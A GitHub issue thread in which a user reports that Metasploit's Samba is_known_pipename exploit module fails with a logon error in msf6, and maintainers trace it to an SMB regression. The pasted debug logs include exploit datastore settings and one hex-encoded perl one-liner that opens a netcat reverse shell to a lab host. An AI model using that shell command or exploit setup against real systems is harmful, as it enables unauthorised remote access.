search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.24k stars 14k forks source link

is_known_pipeline faild #14464

Open thiago0x00 opened 3 years ago

thiago0x00 commented 3 years ago

Hello!

I'm trying to run is_known_pipeline with msf6 and I got an error: STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.

When I use msf5 it does not occur. Is this a bug?

bcoles commented 3 years ago

When I use msf5 it does not occur.

Does the module work with msf5? Do you get a session?

adfoster-r7 commented 3 years ago

When creating an issue, please ensure that the default issue template has been updated with the required details:

https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.github/ISSUE_TEMPLATE/bug_report.md

thiago0x00 commented 3 years ago

name: Bug Report 🐞 about: msf6 does not work correct with exploit is_known_pipeline and when I run in msf5 works perfect.

  1. Start msfconsole
  2. Run the command set loglevel 3
  3. Take the steps necessary recreate your issue
  4. Run the debug command

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/core] log=level 3 [framework/ui/console] ActiveModule=exploit/linux/samba/is_known_pipename [linux/samba/is_known_pipename] DCERPC::fake_bind_multi=false SHELL=/bin/sh WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=192.168.10.131 RPORT=445 SSL=false SSLVersion=Auto SSLVerifyMode=PEER SSLCipher= Proxies= CPORT= CHOST= ConnectTimeout=10 TCP::max_send_size=0 TCP::send_delay=0 DCERPC::max_frag_size=4096 DCERPC::fake_bind_multi_prepend=0 DCERPC::fake_bind_multi_append=0 DCERPC::smb_pipeio=rw DCERPC::ReadTimeout=10 NTLM::UseNTLMv2=true NTLM::UseNTLM2_session=true NTLM::SendLM=true NTLM::UseLMKey=false NTLM::SendNTLM=true NTLM::SendSPN=true SMB::pipe_evasion=false SMB::pipe_write_min_size=1 SMB::pipe_write_max_size=1024 SMB::pipe_read_min_size=1 SMB::pipe_read_max_size=1024 SMB::pad_data_level=0 SMB::pad_file_level=0 SMB::obscure_trans_pipe_level=0 SMBDirect=true SMBUser= SMBPass= SMBDomain=. SMBName=*SMBSERVER SMB::VerifySignature=false SMB::ChunkSize=500 SMB::Native_OS=Windows 2000 2195 SMB::Native_LM=Windows 2000 5.0 SMB::ProtocolVersion=1,2,3 SMB::AlwaysEncrypt=true SMB_SHARE_NAME= SMB_FOLDER= PAYLOAD=cmd/unix/interact ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 174 set log level 3 175 search is_known 176 use 0 177 set rhost 192.168.10.131 178 exploit 179 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/05/2020 07:58:34] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [12/05/2020 17:00:00] [e(0)] core: Failed to connect to the database: No database YAML file [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/05/2020 17:03:49] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [12/03/2020 15:30:41] [d(0)] core: Negotiated SMB version: SMB3 [12/03/2020 15:30:41] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [12/03/2020 15:41:46] [d(0)] core: Module generic/custom is incompatible with multi/samba/usermap_script for PayloadType: limiter was cmd [12/03/2020 15:41:46] [d(0)] core: Module generic/shell_bind_tcp is incompatible with multi/samba/usermap_script for PayloadType: limiter was cmd [12/03/2020 15:41:46] [d(0)] core: Module generic/shell_reverse_tcp is incompatible with multi/samba/usermap_script for PayloadType: limiter was cmd [12/03/2020 15:46:53] [d(0)] core: SMB version(s) to negotiate: [1] [12/03/2020 15:46:53] [d(0)] core: Negotiated SMB version: SMB1 [12/03/2020 16:20:20] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/03/2020 16:20:20] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/03/2020 16:20:20] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/03/2020 16:20:20] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/03/2020 16:21:27] [e(0)] core: Exploit failed (linux/samba/is_known_pipename) - Msf::IncompatiblePayloadError linux/x86/shell/reverse_tcp is not a compatible payload. [12/03/2020 16:21:41] [e(0)] core: Failed to connect to the database: No database YAML file [12/03/2020 16:21:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/03/2020 16:21:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/03/2020 16:21:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/03/2020 16:21:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/03/2020 16:21:43] [w(0)] core: The module linux/remote/42084 is ambiguous with linux/remote/42084. [12/03/2020 16:23:39] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [12/03/2020 16:23:39] [d(0)] core: Negotiated SMB version: SMB3 [12/03/2020 16:23:39] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [12/03/2020 21:20:05] [e(0)] core: Failed to connect to the database: No database YAML file [12/03/2020 21:20:09] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/03/2020 21:20:09] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/03/2020 21:20:09] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/03/2020 21:20:09] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/03/2020 21:20:09] [w(0)] core: The module linux/remote/42084 is ambiguous with linux/remote/42084. [12/03/2020 21:21:12] [d(0)] core: Module generic/custom is incompatible with unix/webapp/drupal_coder_exec for PayloadType: limiter was cmd cmd_bash [12/03/2020 21:21:12] [d(0)] core: Module generic/shell_bind_tcp is incompatible with unix/webapp/drupal_coder_exec for PayloadType: limiter was cmd cmd_bash [12/03/2020 21:21:12] [d(0)] core: Module generic/shell_reverse_tcp is incompatible with unix/webapp/drupal_coder_exec for PayloadType: limiter was cmd cmd_bash [12/03/2020 21:24:28] [d(0)] core: Perl Command Encoder result: perl -e 'system(pack(qq,H186,,qq,6d6b6669666f202f746d702f62746a646a3b206e63203137322e31362e31362e34203434343420303c2f746d702f62746a646a207c202f62696e2f7368203e2f746d702f62746a646a20323e26313b20726d202f746d702f62746a646a,))' [12/03/2020 21:24:28] [i(0)] core: cmd/unix/reverse_netcat: iteration 1: Successfully encoded with encoder cmd/perl (size is 223) [12/05/2020 07:57:57] [e(0)] core: Failed to connect to the database: No database YAML file [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/05/2020 07:58:00] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/05/2020 07:58:01] [w(0)] core: The module linux/remote/42084 is ambiguous with linux/remote/42084. [12/05/2020 07:58:34] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [12/05/2020 07:58:34] [d(0)] core: Negotiated SMB version: SMB3 [12/05/2020 07:58:34] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. [12/05/2020 17:00:00] [e(0)] core: Failed to connect to the database: No database YAML file [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/05/2020 17:00:04] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/05/2020 17:00:05] [w(0)] core: The module linux/remote/42084 is ambiguous with linux/remote/42084. [12/05/2020 17:03:49] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [12/05/2020 17:03:49] [d(0)] core: Negotiated SMB version: SMB3 [12/05/2020 17:03:49] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information. ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.16-dev Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
thiago0x00 commented 3 years ago

Follow the prints. msf5-workfine msf6-bad

thiago0x00 commented 3 years ago

someone?

dwelch-r7 commented 3 years ago

@thiago6826 it looks like you have a typo in your command setting the log level, loglevel is all one word setg loglevel 3 that might give us some more information on the issue

thiago0x00 commented 3 years ago

===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/core] loglevel=3 [framework/ui/console] ActiveModule=exploit/linux/samba/is_known_pipename [linux/samba/is_known_pipename] DCERPC::fake_bind_multi=false SHELL=/bin/sh WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=192.168.10.131 RPORT=445 SSL=false SSLVersion=Auto SSLVerifyMode=PEER SSLCipher= Proxies= CPORT= CHOST= ConnectTimeout=10 TCP::max_send_size=0 TCP::send_delay=0 DCERPC::max_frag_size=4096 DCERPC::fake_bind_multi_prepend=0 DCERPC::fake_bind_multi_append=0 DCERPC::smb_pipeio=rw DCERPC::ReadTimeout=10 NTLM::UseNTLMv2=true NTLM::UseNTLM2_session=true NTLM::SendLM=true NTLM::UseLMKey=false NTLM::SendNTLM=true NTLM::SendSPN=true SMB::pipe_evasion=false SMB::pipe_write_min_size=1 SMB::pipe_write_max_size=1024 SMB::pipe_read_min_size=1 SMB::pipe_read_max_size=1024 SMB::pad_data_level=0 SMB::pad_file_level=0 SMB::obscure_trans_pipe_level=0 SMBDirect=true SMBUser= SMBPass= SMBDomain=. SMBName=*SMBSERVER SMB::VerifySignature=false SMB::ChunkSize=500 SMB::Native_OS=Windows 2000 2195 SMB::Native_LM=Windows 2000 5.0 SMB::ProtocolVersion=1,2,3 SMB::AlwaysEncrypt=true SMB_SHARE_NAME= SMB_FOLDER= PAYLOAD=cmd/unix/interact loglevel=3 ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 89 search is_known 90 use 0 91 set loglevel 3 92 setg loglevel 3 93 set RHOSTS 192.168.10.131 94 exploit 95 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [12/08/2020 11:49:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/08/2020 11:49:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/08/2020 11:49:12] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/08/2020 11:49:12] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/08/2020 11:49:13] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack('' ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [12/08/2020 09:17:11] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/08/2020 09:17:11] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/08/2020 09:17:11] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/08/2020 09:17:11] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack(' ntfea9000 = (pack('' ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.18-dev Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

adfoster-r7 commented 3 years ago

cc @cdelafuente-r7 I haven't replicated this, but from the issue description and bug report it looks like this might be a regression issue with msf6/SMB? πŸ€”

adfoster-r7 commented 3 years ago

Thanks for raising an issue; this looks to be a duplicate of https://github.com/rapid7/metasploit-framework/issues/14355 - but I'll keep this open for now until that work is resolved and this issue can be confirmed as fixed too :+1:

cdelafuente-r7 commented 3 years ago

Yes, that's correct. This issue looks like the same than https://github.com/rapid7/metasploit-framework/issues/14355. I'm working on it πŸ‘

nkakouros commented 3 years ago

@cdelafuente-r7 Would you happen to have an update on this?

adfoster-r7 commented 3 years ago

I think other users have been hitting this issue, there was another request about it in the metasploit slack today